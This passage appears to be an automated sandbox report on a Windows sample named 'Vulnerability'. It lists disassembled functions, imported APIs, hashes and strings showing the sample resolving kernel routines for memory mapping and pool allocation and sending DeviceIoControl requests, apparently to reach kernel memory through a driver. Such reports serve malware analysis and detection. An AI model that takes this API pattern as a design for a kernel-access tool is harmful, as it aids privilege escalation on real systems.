Part of subcall function 00007FF7738EC7A0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC7CD
Part of subcall function 00007FF7738EC7A0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC7E7
Part of subcall function 00007FF7738EC7A0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC819
Part of subcall function 00007FF7738EC7A0: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC844
Part of subcall function 00007FF7738EC7A0: std::_Facet_Register.LIBCPMT ref: 00007FF7738EC85D
Part of subcall function 00007FF7738EC7A0: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF7738EA24A), ref: 00007FF7738EC87C

?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA090
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738EA0A7

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
String ID:
API String ID: 3911317180-0
Opcode ID: 19bad8e0e1a4c278d1f87a288ed97d8dbe98bc2c7c7cfbbf4d8a2ae65ea95ba5
Instruction ID: f4d72a2cf2aacb539e0c51994ee8fa8ae83998245a15b12bbd048fe9afed527d
Opcode Fuzzy Hash: 19bad8e0e1a4c278d1f87a288ed97d8dbe98bc2c7c7cfbbf4d8a2ae65ea95ba5
Instruction Fuzzy Hash: 30314D33639B4682EB90AF25A844329F3A4FB88F89F440235DA8D57758DF3ED454C760

Function 00007FF7738EA5E0 Relevance: 7.6, APIs: 5, Instructions: 134COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA_N_N@Z.MSVCP140 ref: 00007FF7738EA635
?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7738EA656
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738EA6CA
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHXZ.MSVCP140 ref: 00007FF7738EA73F
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA782

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?getloc@ios_base@std@@?setstate@?$basic_ios@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@Vlocale@2@
String ID:
API String ID: 481934583-0
Opcode ID: 001c3b39242a4a663b8eacb246483bd57bafcb69c227ce6b300a4759510acc9f
Instruction ID: 76c8969bcf13d25ca440aaa15311855e9293cff916baa904879de624f04fe43f
Opcode Fuzzy Hash: 001c3b39242a4a663b8eacb246483bd57bafcb69c227ce6b300a4759510acc9f
Instruction Fuzzy Hash: BC518C23629A4181DB90DF1AE590239EBA0FB85F94F458231DE5E577A4CF3EC462C360

Function 00007FF7738E89C0 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E89F3
??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7738E8A12
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E8A44
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738E8A5F

Part of subcall function 00007FF7738E9FB0: ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z.MSVCP140 ref: 00007FF7738E9FEA
Part of subcall function 00007FF7738E9FB0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738EA007
Part of subcall function 00007FF7738E9FB0: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7738EA030
Part of subcall function 00007FF7738E9FB0: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7738EA07B
Part of subcall function 00007FF7738E9FB0: ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA090

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738E8AA9

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Fiopen@std@@U_iobuf@@V?$basic_streambuf@Vlocale@2@_get_stream_buffer_pointers
String ID:
API String ID: 219286276-0
Opcode ID: c3793b0fa0212af6cdd69fd4f1ae6388802a687580cf31eddb082c1ca09b4694
Instruction ID: c6abf04e15e989fa23d1587d47280d26fd66bdc97c925b596f69a340e1f9d625
Opcode Fuzzy Hash: c3793b0fa0212af6cdd69fd4f1ae6388802a687580cf31eddb082c1ca09b4694
Instruction Fuzzy Hash: 3A213932624B8286EB509F29E854329B7A0FB99B88F848235DA8D53724DF3ED155CB50

Function 00007FF7738E3F20 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

SymUnloadModule64.DBGHELP ref: 00007FF7738E3F38
SymCleanup.DBGHELP ref: 00007FF7738E3F42
CloseHandle.KERNEL32 ref: 00007FF7738E3F4C
CloseHandle.KERNEL32 ref: 00007FF7738E3F56
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E3FF6

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: CloseHandle$CleanupModule64Unload_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1118963909-0
Opcode ID: a1a6e426530552f8f4e2a7783f041b7332b5679cac26464a6422e021b01a084b
Instruction ID: 71de1c13d292e406838f19abe7fb4a648a671dddb6a2f800b471bd0443843cc8
Opcode Fuzzy Hash: a1a6e426530552f8f4e2a7783f041b7332b5679cac26464a6422e021b01a084b
Instruction Fuzzy Hash: 02216563A3464682EB54EB25D45833DA361EB54F89F900131DA0D16659DFBFD8D4C360

Function 00007FF7738F0050 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,0492492492492493,00007FF7738EF8F6,?,?,00000000,00000000,?,00000000), ref: 00007FF7738F00F9
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738F01A9

Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122

Strings

gfffffff, xrefs: 00007FF7738EF1DD
gfffffff, xrefs: 00007FF7738F008B

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID: gfffffff$gfffffff
API String ID: 1934640635-161084747
Opcode ID: e28ea14212bf07c75c9a2bd1f11eebad4276c806f5aa789c437229e0e1ab6bf7
Instruction ID: 79e59b848c498d5c5db0da4c30ca3ae7e6433e917d85f391eeba18743a2153f8
Opcode Fuzzy Hash: e28ea14212bf07c75c9a2bd1f11eebad4276c806f5aa789c437229e0e1ab6bf7
Instruction Fuzzy Hash: 8151E373635B4646EE54EB13F440269E3A4EB58BC0F944232DA9C97784DF3DD0A18321

Function 00007FF7738E70E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E7204
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7256

Part of subcall function 00007FF7738EC580: GetModuleHandleA.KERNEL32 ref: 00007FF7738EC5D0
Part of subcall function 00007FF7738EC580: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EC5F8

Strings

[!] Failed to find RtlLookupElementGenericTableAvl, xrefs: 00007FF7738E7239
RtlLookupElementGenericTableAvl, xrefs: 00007FF7738E71A6

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@$HandleModule_invalid_parameter_noinfo_noreturn
String ID: RtlLookupElementGenericTableAvl$[!] Failed to find RtlLookupElementGenericTableAvl
API String ID: 1378083526-1952825546
Opcode ID: 9867886cfc6189a73deae424fe4919759d3be13eabd7a4807b4d814dd99afecc
Instruction ID: adaa020dc8b93f6380c395b7c9392ec75d9a17186ddebf55053ad1b3ede1dc3f
Opcode Fuzzy Hash: 9867886cfc6189a73deae424fe4919759d3be13eabd7a4807b4d814dd99afecc
Instruction Fuzzy Hash: B8419423E38B8241E690EB24E480379E361FB95790F905335FAAD566A5DF3ED0948720

Function 00007FF7738E6E90 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738E6F90

Part of subcall function 00007FF7738F4090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7738E6ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738F40A0

Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28

Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738E6F50

Strings

[!] Failed to find ExAcquireResourceExclusiveLite, xrefs: 00007FF7738E6F73
ExAcquireResourceExclusiveLite, xrefs: 00007FF7738E6EF2

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
String ID: ExAcquireResourceExclusiveLite$[!] Failed to find ExAcquireResourceExclusiveLite
API String ID: 4162525100-2131800721
Opcode ID: 23ad26a5e52ceea44d2795d41e143b7d509da478648eea974c83f5949071cd27
Instruction ID: 56479585c52482e9b52408177576b5fe2a1aeb81d17200668cc1a47f738dd31f
Opcode Fuzzy Hash: 23ad26a5e52ceea44d2795d41e143b7d509da478648eea974c83f5949071cd27
Instruction Fuzzy Hash: 70319663E38A4352FAC0F724E480279E350AF90794FC05331E91D662E5DE3EE4A48730

Function 00007FF7738E60D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E61CE

Part of subcall function 00007FF7738F4090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7738E6ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738F40A0

Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28

Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E618E

Strings

MmUnmapLockedPages, xrefs: 00007FF7738E6130
[!] Failed to find MmUnmapLockedPages, xrefs: 00007FF7738E61B1

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
String ID: MmUnmapLockedPages$[!] Failed to find MmUnmapLockedPages
API String ID: 4162525100-2848997145
Opcode ID: f6198ef0109830dbfd71a9362fd27ef6e1445ed62c2e64b09084b95777afc308
Instruction ID: 3ce68ae0ef6533f6a01437d245aad92aaf2165ecac0eb518da3256ed4d688c9e
Opcode Fuzzy Hash: f6198ef0109830dbfd71a9362fd27ef6e1445ed62c2e64b09084b95777afc308
Instruction Fuzzy Hash: FB31A663F38A4781EA80EB25E580279E360EF94794FC05331E95C666A6DE3EE5D48730

Function 00007FF7738E6320 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E6422

Part of subcall function 00007FF7738F4090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7738E6ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738F40A0

Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28

Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E63E0

Strings

ExFreePool, xrefs: 00007FF7738E6382
[!] Failed to find ExAllocatePool, xrefs: 00007FF7738E6405

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
String ID: ExFreePool$[!] Failed to find ExAllocatePool
API String ID: 4162525100-3091510598
Opcode ID: 270ab59036c19fb5b3f6f0beef8d4a7d86f721c2eafbb1d7ae8509a07653a203
Instruction ID: b18e8ae01434ab159adda8707af634126c576aad22cbeabbd55a498ce0ab446c
Opcode Fuzzy Hash: 270ab59036c19fb5b3f6f0beef8d4a7d86f721c2eafbb1d7ae8509a07653a203
Instruction Fuzzy Hash: 76219FA3E78B4381EA80E724E480179E361AF957D8FC05331E95D662E5DF3EE5A4C630

Function 00007FF7738E6200 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E62F7

Part of subcall function 00007FF7738F4090: AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00007FF7738E6ECE,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7738E74F3), ref: 00007FF7738F40A0

Part of subcall function 00007FF7738EC9F0: memmove.VCRUNTIME140 ref: 00007FF7738ECA28

Part of subcall function 00007FF7738E6440: memset.VCRUNTIME140 ref: 00007FF7738E6491
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E6510
Part of subcall function 00007FF7738E6440: DeviceIoControl.KERNEL32 ref: 00007FF7738E65B0

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E62B7

Strings

[!] Failed to find MmFreePagesFromMdl, xrefs: 00007FF7738E62DA
MmFreePagesFromMdl, xrefs: 00007FF7738E6259

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: ControlDeviceV01@$??6?$basic_ostream@AcquireD@std@@@std@@ExclusiveLockU?$char_traits@V01@@_invalid_parameter_noinfo_noreturnmemmovememset
String ID: MmFreePagesFromMdl$[!] Failed to find MmFreePagesFromMdl
API String ID: 4162525100-1029121595
Opcode ID: ef8dd4537f4b8719acdec15be03d93be2543304a967b88f41ad63023bad5f0f9
Instruction ID: 2a2cd0de3da1e2f7f158341066c31a384197df8932a74ed04a7479af82f345d7
Opcode Fuzzy Hash: ef8dd4537f4b8719acdec15be03d93be2543304a967b88f41ad63023bad5f0f9
Instruction Fuzzy Hash: 4821B463E38A5741EA80FB24E880275E361BF94794FC05331E95CA66E5DF3EE5A4C630

Function 00007FF7738E5FE0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7738E7B00: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E7B4D

Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738E606C

Strings

PAGE, xrefs: 00007FF7738E600F
[!] Failed to find MmFreeIndependentPages, xrefs: 00007FF7738E6056
xxxxxxxxx????xxxxxxx, xrefs: 00007FF7738E6028

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@?good@ios_base@std@@U?$char_traits@_V01@@W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
String ID: PAGE$[!] Failed to find MmFreeIndependentPages$xxxxxxxxx????xxxxxxx
API String ID: 310790477-3730907401
Opcode ID: 3a02ea0e592aa42476571c03a94be0304070044ade117e58495c3f36bb0fc752
Instruction ID: 0499fffc83df92f7fd41056ab60570819a611c1f68a0c344976c6a199c541eaf
Opcode Fuzzy Hash: 3a02ea0e592aa42476571c03a94be0304070044ade117e58495c3f36bb0fc752
Instruction Fuzzy Hash: 8F213072A38B4391EA80AB15F4403A5E3A0FF95788FD04135EA4C2B655DF3EE564CB30

Function 00007FF7738F0F70 Relevance: 6.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

APIs

__std_exception_destroy.VCRUNTIME140 ref: 00007FF7738F1081
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F10AD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F11DB
__std_exception_copy.VCRUNTIME140 ref: 00007FF7738F121D

Memory Dump Source

Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true

Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
String ID:
API String ID: 2138705365-0
Opcode ID: fc289f166b6b73dbb56ea0f1b2d87eea9c67c078dcf9b96923d52efb0a85c74e
Instruction ID: ad6fbed006295b367d88613076a8a9207db232b66bca21a9abfdc92edac9988c
Opcode Fuzzy Hash: fc289f166b6b73dbb56ea0f1b2d87eea9c67c078dcf9b96923d52efb0a85c74e
Instruction Fuzzy Hash: 02819073A24A8291EB44EF25D48436CE361FB54F88F909032D74D17669EF7AD8E4C360

Function 00007FF7738EF480 Relevance: 6.2, APIs: 4, Instructions: 204COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EF604

Part of subcall function 00007FF7738ECD60: memmove.VCRUNTIME140 ref: 00007FF7738ECE27

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EF749
